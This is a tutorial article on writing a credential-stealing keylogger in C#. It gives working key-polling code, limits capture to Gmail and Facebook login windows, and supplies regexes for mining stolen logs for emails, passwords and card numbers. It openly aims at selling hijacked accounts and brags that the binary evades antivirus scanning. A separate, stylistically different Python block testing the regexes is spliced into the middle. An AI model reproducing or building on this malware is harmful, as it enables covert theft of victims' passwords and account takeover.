How to create your own undetectable smart keylogger

Now I will tell and show you how to create your own keylogger that will not be detected by any of the existing antiviruses. And all of this is also free.

Interesting? Then let's go!



Introduction

A keylogger is software or some kind of physical device that can intercept and remember keystrokes on a compromised machine. Think of this as a digital trap for every keystroke on the keyboard.



Often this function is implemented inside other, more complex software, for example Remote Access Trojans (RATs), which also take care of delivering the intercepted data back to the attacker. There are also hardware keyloggers, but they are less common because they require direct physical access to the machine.



Nevertheless, it is quite easy to program the basic functions of a keylogger. 

The code that follows is not optimized; I will just show the lines that accomplish the task, not the most elegant or optimal way of writing them. And finally, I will not cover how to make the keylogger survive reboots, how to hide its traces with special programming techniques, or how to protect it from deletion once it is found.



Get down to business!



To connect to the keyboard, you only need two lines in C#:



    [DllImport("user32.dll")]
    public static extern int GetAsyncKeyState(Int32 i);



GetAsyncKeyState determines whether a key is up or down at the time of the call, and whether it has been pressed since the previous call. Now we call this function continuously to receive data from the keyboard:



    while (true)
    {
        Thread.Sleep(100);
        for (Int32 i = 0; i < 255; i++)
        {
            int state = GetAsyncKeyState(i);
            if (state == 1 || state == -32767)
            {
                Console.WriteLine((Keys)i);
            }
        }
    }



What is going on here? This loop polls every key every 100 ms to determine its state. If one of them is pressed (or was pressed since the last poll), its name is written to the console. In real life, this data is buffered and sent to the hacker, i.e. us.



Smart keylogger



Wait, is there any point in capturing everything typed, from every application?



The code above pulls in raw keyboard input from whatever window and input field currently has the focus. If your goal is credit card numbers and passwords, this approach is not very effective. In real-world scenarios, where such keyloggers run on hundreds or thousands of machines, parsing the collected data afterwards can become very time-consuming and, as a result, pointless: the information valuable to the attacker may be out of date by then.



Let's assume that I want to get my hands on Facebook or Gmail credentials to sell likes. Then the new idea is to activate keylogging only when a browser window is active and the word Gmail or Facebook appears in the page title. Using this method, I increase the chances of getting credentials.



Second version of the code:



    while (true)
    {
        IntPtr handle = GetForegroundWindow();
        if (GetWindowText(handle, buff, chars) > 0)
        {
            string line = buff.ToString();
            if (line.Contains("Gmail") || line.Contains("Facebook - Log In or Sign Up"))
            {
                // scan the keyboard here
            }
        }
        Thread.Sleep(100);
    }


This snippet looks up the active window every 100 ms using the GetForegroundWindow function (see MSDN for details). The window title is stored in the buff variable; if it contains Gmail or Facebook, the keyboard scanning snippet from above is run.



By doing this, we ensure that the keyboard is scanned only while a browser window is open on Facebook or Gmail.



An even smarter keylogger



Let's assume that the hacker was able to collect data with code like ours. Let's also assume that he is ambitious enough to have infected tens or hundreds of thousands of machines. The result is a huge file with gigabytes of text, in which the useful information still has to be found. It is time to get familiar with regular expressions, or regex. This is something like a mini-language for composing patterns and scanning text for matches against them.



For simplicity, I will give ready-made expressions right away that match login names (email addresses) and passwords:



    // Looking for an email address
    ^[\w!#$%&'*+\-/=?\^_{|}~]+(\.[\w!#$%&'*+\-/=?\^_{|}~]+)*@((([\-\w]+\.)+[a-zA-Z]{2,4})|(([0-9]{1,3}\.){3}[0-9]{1,3}))$

    // Looking for a password
    (?=^.{6,}$)(?=.*\d)(?=.*[a-zA-Z])


These expressions are here as a hint of what can be done with them. With regular expressions you can search for (and find!) any construct that has a specific and fixed format, such as passport numbers, credit card numbers, account numbers, and even passwords.



Indeed, regular expressions are not the most readable kind of code, but they are one of the programmer's best friends when it comes to parsing text. Java, C#, JavaScript and other popular languages already have ready-made functions to which you can pass regular expressions.



For C# it looks like this:



    // email address pattern
    Regex re = new Regex(@"^[\w!#$%&'*+\-/=?\^_{|}~]+(\.[\w!#$%&'*+\-/=?\^_{|}~]+)*@((([\-\w]+\.)+[a-zA-Z]{2,4})|(([0-9]{1,3}\.){3}[0-9]{1,3}))$");
    // password pattern: at least 6 characters, at least one digit, at least one letter
    Regex re2 = new Regex(@"(?=^.{6,}$)(?=.*\d)(?=.*[a-zA-Z])");
    string email = "Oded.awask@gmail.com";
    string pass = "abcde3FG";
    Match result = re.Match(email);
    Match result2 = re2.Match(pass);


Here the first expression (re) matches any email address, and the second (re2) matches any alphanumeric string longer than 6 characters that contains both digits and letters.
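The following is an added example, not code from the article, written in Python rather than C# because the two patterns behave the same in both engines. It runs the article's two expressions over constructed strings to show what they actually accept: the `{6,}` quantifier admits exactly six characters, the email pattern rejects top-level domains longer than four letters, and the "password" expression is only a shape check that ordinary phrases containing a digit also satisfy. The function names and all inputs other than the article's sample address are my own.

```python
import re

# The two expressions from the article, transcribed without the extraction spacing.
EMAIL_RE = re.compile(
    r"^[\w!#$%&'*+\-/=?\^_{|}~]+(\.[\w!#$%&'*+\-/=?\^_{|}~]+)*"
    r"@((([\-\w]+\.)+[a-zA-Z]{2,4})|(([0-9]{1,3}\.){3}[0-9]{1,3}))$"
)
# Three lookaheads: at least 6 characters, at least one digit, at least one ASCII letter.
PASSWORD_RE = re.compile(r"(?=^.{6,}$)(?=.*\d)(?=.*[a-zA-Z])")


def is_email(s: str) -> bool:
    """True when the whole string satisfies the article's email expression."""
    return EMAIL_RE.match(s) is not None


def passes_password_shape(s: str) -> bool:
    """True when the string meets the length/digit/letter lookaheads."""
    return PASSWORD_RE.match(s) is not None


def over_match_rate(samples: list[str]) -> float:
    """Fraction of ordinary, non-password strings the password expression accepts."""
    hits = sum(passes_password_shape(s) for s in samples)
    return hits / len(samples)


# Constructed inputs (hypothetical, not from the article) probing the email expression.
EMAIL_CASES = {
    "Oded.awask@gmail.com": True,        # the article's own sample address
    "user@192.168.0.1": True,            # dotted-quad branch of the alternation
    "first.last@example.co.uk": True,    # multi-label domain, 2-letter TLD
    "user@example.technology": False,    # TLD longer than 4 letters is rejected
    "user@@example.com": False,          # second '@' cannot be part of a domain label
    "no-at-sign.example.com": False,
}

# Constructed everyday text fragments: none is a password, yet 3 of 5 pass PASSWORD_RE.
ORDINARY_TEXT = [
    "meeting at 3pm",
    "order #12345 shipped",
    "Windows 11",
    "hello world",
    "call me",
]
```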



Free and no detections



In my example, I used Visual Studio - you can use your favorite environment - to create such a keylogger in 30 minutes.



There is only one question left: will such software really be undetectable for antivirus programs?



I compiled my code and checked the exe file on the VirusTotal website. It is a web-based tool that calculates the hash of the file you upload and looks for it in a database of known viruses. Surprise! Naturally, nothing was found.



This is the main point! You can always change and develop your code, staying several steps ahead of threat scanners. If you are able to write your own code, it is almost guaranteed to be undetectable.



So that's it

